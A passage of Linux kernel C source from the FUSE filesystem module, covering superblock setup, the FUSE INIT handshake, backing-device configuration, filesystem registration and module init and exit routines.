	struct inode *child_inode = d_inode(child);
	struct fuse_conn *fc = get_fuse_conn(child_inode);
	struct inode *inode;
	struct dentry *parent;
	struct fuse_entry_out outarg;
	struct qstr name;
	int err;

	if (!fc->export_support)
		return ERR_PTR(-ESTALE);

	name.len = 2;
	name.name = "..";
	err = fuse_lookup_name(child_inode->i_sb, get_node_id(child_inode),
			       &name, &outarg, &inode);
	if (err) {
		if (err == -ENOENT)
			return ERR_PTR(-ESTALE);
		return ERR_PTR(err);
	}

	parent = d_obtain_alias(inode);
	if (!IS_ERR(parent) && get_node_id(inode) != FUSE_ROOT_ID)
		fuse_invalidate_entry_cache(parent);

	return parent;
}

static const struct export_operations fuse_export_operations = {
	.fh_to_dentry	= fuse_fh_to_dentry,
	.fh_to_parent	= fuse_fh_to_parent,
	.encode_fh
			= fuse_encode_fh,
	.get_parent	= fuse_get_parent,
};

static const struct super_operations fuse_super_operations = {
	.alloc_inode    = fuse_alloc_inode,
	.destroy_inode  = fuse_destroy_inode,
	.evict_inode	= fuse_evict_inode,
	.write_inode	= fuse_write_inode,
	.drop_inode	= generic_delete_inode,
	.remount_fs	= fuse_remount_fs,
	.put_super	= fuse_put_super,
	.umount_begin	= fuse_umount_begin,
	.statfs		= fuse_statfs,
	.show_options	= fuse_show_options,
};

static void sanitize_global_limit(unsigned *limit)
{
	if (*limit == 0)
		*limit = ((totalram_pages << PAGE_SHIFT) >> 13) /
			 sizeof(struct fuse_req);

	if (*limit >= 1 << 16)
		*limit = (1 << 16) - 1;
}

static int set_global_limit(const char *val, struct kernel_param *kp)
{
	int rv;

	rv = param_set_uint(val, kp);
	if (rv)
		return rv;

	sanitize_global_limit((unsigned *)kp->arg);

	return 0;
}

static void process_init_limits(struct fuse_conn *fc, struct fuse_init_out *arg)
{
	int cap_sys_admin = capable(CAP_SYS_ADMIN);

	if (arg->minor < 13)
		return;

	sanitize_global_limit(&max_user_bgreq);
	sanitize_global_limit(&max_user_congthresh);

	if (arg->max_background) {
		fc->max_background = arg->max_background;

		if (!cap_sys_admin && fc->max_background > max_user_bgreq)
			fc->max_background = max_user_bgreq;
	}
	if (arg->congestion_threshold) {
		fc->congestion_threshold = arg->congestion_threshold;

		if (!cap_sys_admin &&
		    fc->congestion_threshold > max_user_congthresh)
			fc->congestion_threshold = max_user_congthresh;
	}
}

static void process_init_reply(struct fuse_conn *fc, struct fuse_req *req)
{
	struct fuse_init_out *arg = &req->misc.init_out;

	if (req->out.h.error || arg->major != FUSE_KERNEL_VERSION)
		fc->conn_error = 1;
	else {
		unsigned long ra_pages;

		process_init_limits(fc, arg);

		if (arg->minor >= 6) {
			ra_pages = arg->max_readahead / PAGE_SIZE;
			if (arg->flags & FUSE_ASYNC_READ)
				fc->async_read = 1;
			if (!(arg->flags & FUSE_POSIX_LOCKS))
				fc->no_lock = 1;
			if (arg->minor >= 17) {
				if (!(arg->flags & FUSE_FLOCK_LOCKS))
					fc->no_flock = 1;
			} else {
				if (!(arg->flags &
				      FUSE_POSIX_LOCKS))
					fc->no_flock = 1;
			}
			if (arg->flags & FUSE_ATOMIC_O_TRUNC)
				fc->atomic_o_trunc = 1;
			if (arg->minor >= 9) {
				/* LOOKUP has dependency on proto version */
				if (arg->flags & FUSE_EXPORT_SUPPORT)
					fc->export_support = 1;
			}
			if (arg->flags & FUSE_BIG_WRITES)
				fc->big_writes = 1;
			if (arg->flags & FUSE_DONT_MASK)
				fc->dont_mask = 1;
			if (arg->flags & FUSE_AUTO_INVAL_DATA)
				fc->auto_inval_data = 1;
			if (arg->flags & FUSE_DO_READDIRPLUS) {
				fc->do_readdirplus = 1;
				if (arg->flags & FUSE_READDIRPLUS_AUTO)
					fc->readdirplus_auto = 1;
			}
			if (arg->flags & FUSE_ASYNC_DIO)
				fc->async_dio = 1;
			if (arg->flags & FUSE_WRITEBACK_CACHE)
				fc->writeback_cache = 1;
			if (arg->time_gran && arg->time_gran <= 1000000000)
				fc->sb->s_time_gran = arg->time_gran;
		} else {
			ra_pages = fc->max_read / PAGE_SIZE;
			fc->no_lock = 1;
			fc->no_flock = 1;
		}

		fc->bdi.ra_pages = min(fc->bdi.ra_pages, ra_pages);
		fc->minor = arg->minor;
		fc->max_write = arg->minor < 5 ? 4096 : arg->max_write;
		fc->max_write = max_t(unsigned, 4096, fc->max_write);
		fc->conn_init = 1;
	}
	fuse_set_initialized(fc);
	wake_up_all(&fc->blocked_waitq);
}

static void fuse_send_init(struct fuse_conn *fc, struct fuse_req *req)
{
	struct fuse_init_in *arg = &req->misc.init_in;

	arg->major = FUSE_KERNEL_VERSION;
	arg->minor = FUSE_KERNEL_MINOR_VERSION;
	arg->max_readahead = fc->bdi.ra_pages * PAGE_SIZE;
	arg->flags |= FUSE_ASYNC_READ | FUSE_POSIX_LOCKS | FUSE_ATOMIC_O_TRUNC |
		FUSE_EXPORT_SUPPORT | FUSE_BIG_WRITES | FUSE_DONT_MASK |
		FUSE_SPLICE_WRITE | FUSE_SPLICE_MOVE | FUSE_SPLICE_READ |
		FUSE_FLOCK_LOCKS | FUSE_IOCTL_DIR | FUSE_AUTO_INVAL_DATA |
		FUSE_DO_READDIRPLUS | FUSE_READDIRPLUS_AUTO | FUSE_ASYNC_DIO |
		FUSE_WRITEBACK_CACHE | FUSE_NO_OPEN_SUPPORT;
	req->in.h.opcode = FUSE_INIT;
	req->in.numargs = 1;
	req->in.args[0].size = sizeof(*arg);
	req->in.args[0].value = arg;
	req->out.numargs = 1;
	/* Variable length argument used for backward compatibility with
	   interface version < 7.5.
	   Rest of init_out is zeroed by do_get_request(), so a short reply
	   is not a problem */
	req->out.argvar = 1;
	req->out.args[0].size = sizeof(struct fuse_init_out);
	req->out.args[0].value = &req->misc.init_out;
	req->end = process_init_reply;
	fuse_request_send_background(fc, req);
}

static void fuse_free_conn(struct fuse_conn *fc)
{
	WARN_ON(!list_empty(&fc->devices));
	kfree_rcu(fc, rcu);
}

static int fuse_bdi_init(struct fuse_conn *fc, struct super_block *sb)
{
	int err;

	fc->bdi.name = "fuse";
	fc->bdi.ra_pages = (VM_MAX_READAHEAD * 1024) / PAGE_SIZE;
	/* fuse does its own writeback accounting */
	fc->bdi.capabilities = BDI_CAP_NO_ACCT_WB | BDI_CAP_STRICTLIMIT;

	err = bdi_init(&fc->bdi);
	if (err)
		return err;

	fc->bdi_initialized = 1;

	if (sb->s_bdev) {
		err = bdi_register(&fc->bdi, NULL, "%u:%u-fuseblk",
				   MAJOR(fc->dev), MINOR(fc->dev));
	} else {
		err = bdi_register_dev(&fc->bdi, fc->dev);
	}

	if (err)
		return err;

	/*
	 * For a single fuse filesystem use max 1% of dirty +
	 * writeback threshold.
	 *
	 * This gives about 1M of write buffer for memory maps on a
	 * machine with 1G and 10% dirty_ratio, which should be more
	 * than enough.
	 *
	 * Privileged users can raise it by writing to
	 *
	 *    /sys/class/bdi/<bdi>/max_ratio
	 */
	bdi_set_max_ratio(&fc->bdi, 1);

	return 0;
}

struct fuse_dev *fuse_dev_alloc(struct fuse_conn *fc)
{
	struct fuse_dev *fud;

	fud = kzalloc(sizeof(struct fuse_dev), GFP_KERNEL);
	if (fud) {
		fud->fc = fuse_conn_get(fc);
		fuse_pqueue_init(&fud->pq);

		spin_lock(&fc->lock);
		list_add_tail(&fud->entry, &fc->devices);
		spin_unlock(&fc->lock);
	}

	return fud;
}
EXPORT_SYMBOL_GPL(fuse_dev_alloc);

void fuse_dev_free(struct fuse_dev *fud)
{
	struct fuse_conn *fc = fud->fc;

	if (fc) {
		spin_lock(&fc->lock);
		list_del(&fud->entry);
		spin_unlock(&fc->lock);

		fuse_conn_put(fc);
	}
	kfree(fud);
}
EXPORT_SYMBOL_GPL(fuse_dev_free);

static int fuse_fill_super(struct super_block *sb, void *data, int silent)
{
	struct fuse_dev *fud;
	struct fuse_conn *fc;
	struct inode *root;
	struct fuse_mount_data d;
	struct file *file;
	struct dentry *root_dentry;
	struct fuse_req *init_req;
	int err;
	int is_bdev = sb->s_bdev != NULL;

	err = -EINVAL;
	if (sb->s_flags & MS_MANDLOCK)
		goto err;

	sb->s_flags &= ~(MS_NOSEC | MS_I_VERSION);

	if (!parse_fuse_opt(data, &d, is_bdev))
		goto err;

	if (is_bdev) {
#ifdef CONFIG_BLOCK
		err = -EINVAL;
		if (!sb_set_blocksize(sb, d.blksize))
			goto err;
#endif
	} else {
		sb->s_blocksize = PAGE_SIZE;
		sb->s_blocksize_bits = PAGE_SHIFT;
	}
	sb->s_magic = FUSE_SUPER_MAGIC;
	sb->s_op = &fuse_super_operations;
	sb->s_maxbytes = MAX_LFS_FILESIZE;
	sb->s_time_gran = 1;
	sb->s_export_op = &fuse_export_operations;

	file = fget(d.fd);
	err = -EINVAL;
	if (!file)
		goto err;

	if ((file->f_op != &fuse_dev_operations) ||
	    (file->f_cred->user_ns != &init_user_ns))
		goto err_fput;

	fc = kmalloc(sizeof(*fc), GFP_KERNEL);
	err = -ENOMEM;
	if (!fc)
		goto err_fput;

	fuse_conn_init(fc);
	fc->release = fuse_free_conn;

	fud = fuse_dev_alloc(fc);
	if (!fud)
		goto err_put_conn;

	fc->dev = sb->s_dev;
	fc->sb = sb;
	err = fuse_bdi_init(fc, sb);
	if (err)
		goto err_dev_free;

	sb->s_bdi = &fc->bdi;

	/* Handle umasking inside the fuse code */
	if (sb->s_flags & MS_POSIXACL)
		fc->dont_mask = 1;
	sb->s_flags |= MS_POSIXACL;

	fc->flags = d.flags;
	fc->user_id = d.user_id;
	fc->group_id = d.group_id;
	fc->max_read = max_t(unsigned, 4096, d.max_read);

	/* Used by get_root_inode() */
	sb->s_fs_info = fc;

	err = -ENOMEM;
	root = fuse_get_root_inode(sb, d.rootmode);
	root_dentry = d_make_root(root);
	if (!root_dentry)
		goto err_dev_free;
	/* only now - we want root dentry with NULL ->d_op */
	sb->s_d_op = &fuse_dentry_operations;

	init_req = fuse_request_alloc(0);
	if (!init_req)
		goto err_put_root;
	__set_bit(FR_BACKGROUND, &init_req->flags);

	if (is_bdev) {
		fc->destroy_req = fuse_request_alloc(0);
		if (!fc->destroy_req)
			goto err_free_init_req;
	}

	mutex_lock(&fuse_mutex);
	err = -EINVAL;
	if (file->private_data)
		goto err_unlock;

	err = fuse_ctl_add_conn(fc);
	if (err)
		goto err_unlock;

	list_add_tail(&fc->entry, &fuse_conn_list);
	sb->s_root = root_dentry;
	file->private_data = fud;
	mutex_unlock(&fuse_mutex);
	/*
	 * atomic_dec_and_test() in fput() provides the necessary
	 * memory barrier for file->private_data to be visible on all
	 * CPUs after this
	 */
	fput(file);

	fuse_send_init(fc, init_req);

	return 0;

 err_unlock:
	mutex_unlock(&fuse_mutex);
 err_free_init_req:
	fuse_request_free(init_req);
 err_put_root:
	dput(root_dentry);
 err_dev_free:
	fuse_dev_free(fud);
 err_put_conn:
	fuse_bdi_destroy(fc);
	fuse_conn_put(fc);
 err_fput:
	fput(file);
 err:
	return err;
}

static struct dentry *fuse_mount(struct file_system_type *fs_type,
		       int flags, const char *dev_name,
		       void *raw_data)
{
	return mount_nodev(fs_type, flags, raw_data, fuse_fill_super);
}

static void fuse_kill_sb_anon(struct super_block *sb)
{
	struct fuse_conn *fc = get_fuse_conn_super(sb);

	if (fc) {
		down_write(&fc->killsb);
		fc->sb = NULL;
		up_write(&fc->killsb);
	}

	kill_anon_super(sb);
}

static struct file_system_type fuse_fs_type = {
	.owner		= THIS_MODULE,
	.name		= "fuse",
	.fs_flags	= FS_HAS_SUBTYPE,
	.mount		= fuse_mount,
	.kill_sb	= fuse_kill_sb_anon,
};
MODULE_ALIAS_FS("fuse");

#ifdef CONFIG_BLOCK
static struct dentry
		    *fuse_mount_blk(struct file_system_type *fs_type,
				    int flags, const char *dev_name,
				    void *raw_data)
{
	return mount_bdev(fs_type, flags, dev_name, raw_data, fuse_fill_super);
}

static void fuse_kill_sb_blk(struct super_block *sb)
{
	struct fuse_conn *fc = get_fuse_conn_super(sb);

	if (fc) {
		down_write(&fc->killsb);
		fc->sb = NULL;
		up_write(&fc->killsb);
	}

	kill_block_super(sb);
}

static struct file_system_type fuseblk_fs_type = {
	.owner		= THIS_MODULE,
	.name		= "fuseblk",
	.mount		= fuse_mount_blk,
	.kill_sb	= fuse_kill_sb_blk,
	.fs_flags	= FS_REQUIRES_DEV | FS_HAS_SUBTYPE,
};
MODULE_ALIAS_FS("fuseblk");

static inline int register_fuseblk(void)
{
	return register_filesystem(&fuseblk_fs_type);
}

static inline void unregister_fuseblk(void)
{
	unregister_filesystem(&fuseblk_fs_type);
}
#else
static inline int register_fuseblk(void)
{
	return 0;
}

static inline void unregister_fuseblk(void)
{
}
#endif

static void fuse_inode_init_once(void *foo)
{
	struct inode *inode = foo;

	inode_init_once(inode);
}

static int __init fuse_fs_init(void)
{
	int err;

	fuse_inode_cachep = kmem_cache_create("fuse_inode",
					      sizeof(struct fuse_inode), 0,
					      SLAB_HWCACHE_ALIGN|SLAB_ACCOUNT,
					      fuse_inode_init_once);
	err = -ENOMEM;
	if (!fuse_inode_cachep)
		goto out;

	err = register_fuseblk();
	if (err)
		goto out2;

	err = register_filesystem(&fuse_fs_type);
	if (err)
		goto out3;

	return 0;

 out3:
	unregister_fuseblk();
 out2:
	kmem_cache_destroy(fuse_inode_cachep);
 out:
	return err;
}

static void fuse_fs_cleanup(void)
{
	unregister_filesystem(&fuse_fs_type);
	unregister_fuseblk();

	/*
	 * Make sure all delayed rcu free inodes are flushed before we
	 * destroy cache.
	 */
	rcu_barrier();
	kmem_cache_destroy(fuse_inode_cachep);
}

static struct kobject *fuse_kobj;

static int fuse_sysfs_init(void)
{
	int err;

	fuse_kobj = kobject_create_and_add("fuse", fs_kobj);
	if (!fuse_kobj) {
		err = -ENOMEM;
		goto out_err;
	}

	err = sysfs_create_mount_point(fuse_kobj, "connections");
	if (err)
		goto out_fuse_unregister;

	return 0;

 out_fuse_unregister:
	kobject_put(fuse_kobj);
 out_err:
	return err;
}

static void fuse_sysfs_cleanup(void)
{
	sysfs_remove_mount_point(fuse_kobj, "connections");
	kobject_put(fuse_kobj);
}

static int __init fuse_init(void)
{
	int res;

	printk(KERN_INFO "fuse init (API version %i.%i)\n",
	       FUSE_KERNEL_VERSION, FUSE_KERNEL_MINOR_VERSION);

	INIT_LIST_HEAD(&fuse_conn_list);
	res = fuse_fs_init();
	if (res)
		goto err;

	res = fuse_dev_init();
	if (res)
		goto err_fs_cleanup;

	res = fuse_sysfs_init();
	if (res)
		goto err_dev_cleanup;

	res = fuse_ctl_init();
	if (res)
		goto err_sysfs_cleanup;

	sanitize_global_limit(&max_user_bgreq);
	sanitize_global_limit(&max_user_congthresh);

	return 0;

 err_sysfs_cleanup:
	fuse_sysfs_cleanup();
 err_dev_cleanup:
	fuse_dev_cleanup();
 err_fs_cleanup:
	fuse_fs_cleanup();
 err:
	return res;
}

static void __exit fuse_exit(void)
{
	printk(KERN_DEBUG "fuse exit\n");

	fuse_ctl_cleanup();
	fuse_sysfs_cleanup();
	fuse_fs_cleanup();
	fuse_dev_cleanup();
}

module_init(fuse_init);
module_exit(fuse_exit);